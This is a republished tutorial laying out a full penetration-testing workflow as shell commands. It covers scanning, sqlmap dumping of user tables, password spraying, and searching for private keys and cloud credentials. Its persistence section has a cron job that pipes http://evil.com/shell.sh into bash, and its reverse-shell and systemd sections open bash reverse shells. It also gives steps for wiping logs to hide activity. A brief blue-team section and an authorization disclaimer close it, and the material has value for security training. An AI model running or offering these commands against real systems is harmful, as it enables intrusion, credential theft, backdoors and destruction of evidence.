Practical Shell Script Guide for Network Security
This guide walks through a complete penetration‑testing workflow, covering information gathering, fast port scanning, service fingerprinting, vulnerability discovery, automated scanning, exploitation, privilege escalation, lateral movement, data exfiltration, persistence techniques, log cleaning, and defensive scripting with concrete command examples for each step.
Attack Workflow Overview
Information gathering → asset discovery → vulnerability scanning → exploitation → privilege escalation → lateral movement → persistence → data collection → log cleaning.
1. Information Gathering & Vulnerability Analysis
Port Scanning & Service Identification
Classic tool: nmap. Scans ports, detects service versions, OS, and runs default vulnerability scripts.
# Detect OS, service versions and run default scripts
nmap -sV -O --script=default <target_ip>Output includes open ports, running services, service versions, OS type, and potential vulnerabilities.
High‑Speed Scanning
For large networks use masscan, which can reach up to 10 million packets per second. masscan 192.168.1.0/24 -p1-65535 --rate=10000 Applicable to internal network scans, internet asset mapping, and large‑scale security audits.
Web Technology Fingerprinting
Tool: WhatWeb. whatweb http://target.com Typical output: Apache 2.4.49, PHP 7.4, WordPress, CDN.
Subdomain Discovery
Tool: subfinder. subfinder -d example.com Example output: api.example.com, dev.example.com, test.example.com.
Exploit Code Search
Tool: searchsploit (queries Exploit‑DB). searchsploit apache 2.4.49 Finds matching exploit code quickly.
2. Automated Vulnerability Scanning
Tool: nuclei, popular for scanning CVEs, weak passwords, misconfigurations, information leaks, and web flaws.
Basic Scan
nuclei -u http://target.comCritical/High‑Severity Scan
nuclei -l targets.txt -severity critical,high3. Web Exploitation
SQL Injection Automation
Tool: sqlmap.
sqlmap -u "http://target.com?id=1" --dbs sqlmap -u "http://target.com?id=1" -D dbname --tables sqlmap -u "http://target.com?id=1" -D dbname -T users --dump4. Privilege Escalation & Enumeration
Linux Exploit Suggester
./les2.shAnalyzes the current kernel version and suggests possible privilege‑escalation exploits.
System Enumeration
Tool: LinEnum. ./LinEnum.sh -t Checks SUID files, environment variables, scheduled jobs, writable files, and sensitive configurations.
Python Privilege Check
Tool: linuxprivchecker. python3 linuxprivchecker.py -w -o loot.txt Outputs a full vulnerability analysis report.
5. Reverse Shell Techniques
Classic Bash reverse shell:
bash -i >& /dev/tcp/your_ip/your_port 0>&1Listener: nc -lvnp 4444 Payload generation with Metasploit:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf > shell6. Lateral Movement
Password Spraying
Tool: hydra.
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100Internal Network Attack Tools
Tool: CrackMapExec.
cme smb 192.168.1.0/24 cme smb 192.168.1.0/24 -u admin -p password7. Data Collection & Sensitive Information Discovery
Search Private Keys
find / -type f -name "id_rsa" 2>/dev/nullSearch .env Files
find / -name ".env"Search Cloud Keys (e.g., AWS)
grep -R "AKIA" .8. Persistence (Backdoors)
SSH Backdoor
mkdir ~/.ssh
echo "attacker_key" >> ~/.ssh/authorized_keysCron Backdoor
crontab -e */10 * * * * curl http://evil.com/shell.sh | bashsystemd Service Backdoor
/etc/systemd/system/backdoor.service [Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/x.x.x.x/4444 0>&1'9. Log Cleaning
Clear Bash History
history -c
rm ~/.bash_historyClear Authentication Logs
echo "" > /var/log/auth.log10. Blue‑Team Detection Scripts
Detect SSH Brute‑Force Attempts
grep "Failed password" /var/log/auth.log | awk '{print $(11)}' | sort | uniq -c | sort -nrDetect Suspicious Network Connections
netstat -antp | grep ESTABLISHEDDetect High‑CPU Processes
ps aux --sort=-%cpu | headList Cron Jobs
crontab -l
/etc/cron*11. Security Automation Script Example
#!/bin/bash
echo "===== Open Ports ====="
ss -tulnp
echo "===== Network Connections ====="
netstat -antp | grep ESTABLISHED
echo "===== SUID Files ====="
find / -perm -4000 -type f 2>/dev/null
echo "===== Recent Logins ====="
lastSchedule with cron:
crontab -e
0 * * * * /opt/security_scan.shEnterprise‑Level Security Toolchain
Recon
├─ subfinder
├─ masscan
├─ nmap
Vulnerability
├─ nuclei
├─ sqlmap
Exploit
├─ metasploit
├─ exploit-db
Post Exploit
├─ linpeas
├─ linenum
Lateral Movement
├─ hydra
├─ crackmapexec
Persistence
├─ ssh backdoor
├─ cron backdoorCore Practical Principles
Legal Authorization
All security testing must have explicit permission; unauthorized attacks are illegal.
Understand Underlying Concepts
Grasp network protocols, Linux privilege model, system logging, and vulnerability mechanics rather than merely copying commands.
Continuous Updating
New vulnerabilities appear constantly.
Attack techniques evolve.
Defensive technologies improve.
Attack‑Defense Integration
Effective defense stems from understanding attacker tools and scripts, enabling security engineers to design robust detection and protection mechanisms.
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
Cloud Architecture
Focuses on cloud‑native and distributed architecture engineering, sharing practical solutions and lessons learned. Covers microservice governance, Kubernetes, observability, and stability engineering to help your systems run stable, fast, and cost‑effectively.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.
